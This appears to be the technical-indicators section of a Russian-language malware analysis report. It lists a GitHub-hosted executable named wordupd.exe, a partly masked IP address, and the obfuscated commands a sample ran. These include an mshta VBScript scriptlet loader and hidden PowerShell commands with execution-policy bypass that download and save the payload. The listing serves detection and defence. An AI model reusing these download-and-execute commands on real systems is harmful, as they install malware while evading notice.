Техническая информация
- https://github.com/ecusembassy/kraken/raw/master/wordupd.exe
- '<SYSTEM32>\mshta.exe' vbsCRiPt:clOSE (gETobJECt ("sCRipT:http://17#.#7.68.60/druid/files/w4mm1gjiJ7st_weriuy734uii") )
- http://17#.#7.68.60/druid/files/w4mm1gjiJ7st_weriuy734uii
- DNS ASK gi##ub.com
- '<SYSTEM32>\mshta.exe' vbsCRiPt:clOSE (gETobJECt ("sCRipT:http://17#.#7.68.60/druid/files/w4mm1gjiJ7st_weriuy734uii") )' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/C poweRshelL.eXE -Ex ByPasS -noP -w 1 Set-CoNtEnt -va ( nEw-objecT NEt.WEbcLieNT ).dOWNlOaDData( 'https://github.com/EcUSEmbassy/Kraken/raw/master/Wordupd.exe' ) -...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/C poweRshelL.eXE -Ex ByPasS -noP -w 1 Set-CoNtEnt -va ( nEw-objecT NEt.WEbcLieNT ).dOWNlOaDData( 'https://github.com/EcUSEmbassy/Kraken/raw/master/Wordupd.exe' ) -...